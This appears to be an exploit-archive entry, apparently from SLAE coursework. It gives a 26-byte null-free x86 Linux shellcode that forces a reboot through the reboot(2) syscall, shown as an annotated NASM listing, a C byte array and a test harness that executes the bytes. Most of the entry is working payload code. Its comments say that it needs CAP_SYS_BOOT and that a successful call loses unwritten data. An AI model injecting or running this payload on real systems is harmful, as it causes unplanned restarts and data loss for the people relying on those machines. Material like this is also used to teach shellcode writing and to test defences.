# Exploit Title: Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
# Purpose: This is an x86 Linux null-free polymorphic shellcode for forcing a reboot.
# Date: 2020-03-23
# Author: Upayan a.k.a. slaeryan
# Contact: upayansaha@icloud.com
# SLAE: 1525
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# CVE: N/A
/*
; Filename: reboot_polymorphic.nasm
; Author: Upayan a.k.a. slaeryan
; SLAE: 1525
; Contact: upayansaha@icloud.com
; Purpose: This is an x86 Linux null-free polymorphic shellcode for forcing a reboot.
; Testing: ./reboot_polymorphic
; Compile with: ./compile.sh reboot_polymorphic
; Size of shellcode: 26 bytes
;-----------------------------------------------------------------------
; _start: issue reboot(magic1, magic2, cmd) through the i386 int 0x80 gate
; Syntax: NASM (Intel), 32-bit x86 Linux
; In:     nothing
; Regs:   eax = syscall number, ebx = magic1, ecx = magic2, edx = cmd
;
; The kernel only honours reboot(2) for a caller holding CAP_SYS_BOOT.
; Without it int 0x80 returns an error in eax, and because no instruction
; follows, execution runs off the end of the listing.
; LINUX_REBOOT_CMD_RESTART does not sync filesystems first, so unwritten
; data is lost when the call succeeds.
;-----------------------------------------------------------------------

; Named constants; they assemble to the same immediates as the raw values.
SYS_REBOOT                equ 0x58         ; i386 syscall number for reboot
LINUX_REBOOT_MAGIC1       equ 0xfee1dead   ; first magic value checked by the kernel
LINUX_REBOOT_MAGIC2       equ 672274793    ; second magic value (0x28121969)
LINUX_REBOOT_CMD_RESTART  equ 0x1234567    ; cmd argument: restart the system

global _start

section .text

_start:
        xor     eax, eax                        ; eax = 0, so the al write below leaves eax = 0x58
        xor     ebx, ebx                        ; ebx = 0 (fully overwritten by the mov below)
        xor     ecx, ecx                        ; ecx = 0 (fully overwritten by the mov below)
        cdq                                     ; edx = sign extension of eax = 0

        mov     al, SYS_REBOOT                  ; 8-bit write keeps the encoding free of 0x00 bytes
        mov     ebx, LINUX_REBOOT_MAGIC1
        mov     ecx, LINUX_REBOOT_MAGIC2
        mov     edx, LINUX_REBOOT_CMD_RESTART

        int     0x80                            ; reboot(magic1, magic2, cmd)
*/
#include <stdio.h>
#include <string.h>
/*
 * Assembled bytes of the NASM listing in the comment above, written as one
 * string literal per instruction (adjacent literals are concatenated by the
 * compiler). 26 bytes, none of them 0x00; the array itself is 27 bytes
 * because of the string terminator.
 */
unsigned char code[] =
    "\x31\xc0"                  /* xor eax, eax                           */
    "\x31\xdb"                  /* xor ebx, ebx                           */
    "\x31\xc9"                  /* xor ecx, ecx                           */
    "\x99"                      /* cdq                                    */
    "\xb0\x58"                  /* mov al, 0x58      (reboot syscall nr)  */
    "\xbb\xad\xde\xe1\xfe"      /* mov ebx, 0xfee1dead (magic 1)          */
    "\xb9\x69\x19\x12\x28"      /* mov ecx, 0x28121969 (magic 2)          */
    "\xba\x67\x45\x23\x01"      /* mov edx, 0x01234567 (CMD_RESTART)      */
    "\xcd\x80";                 /* int 0x80                               */
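/*
 * Test harness: prints the payload length, then calls the byte array as a
 * function.
 *
 * code[] is ordinary writable data. Where non-executable data pages (NX)
 * are enforced, the call below faults instead of running the payload unless
 * the binary was built with executable data; the build flags live in
 * compile.sh, which is not shown here.
 *
 * The payload uses the 32-bit int 0x80 interface (the header says "Tested
 * on: Linux x86"). reboot(2) needs CAP_SYS_BOOT: with it the machine
 * restarts and the call never returns; without it the syscall fails and
 * execution continues into the bytes after the payload.
 */
int main(void)
{
    /*
     * strlen() stops at the first 0x00 byte, so a printed length of 26 also
     * confirms the payload is null-free. strlen() returns size_t, hence %zu;
     * the cast is needed because code[] is unsigned char.
     */
    printf("Shellcode Length: %zu\n", strlen((const char *)code));

    /* Reinterpret the data array as a function pointer and jump into it. */
    int (*ret)() = (int(*)())code;

    ret();

    return 0;
}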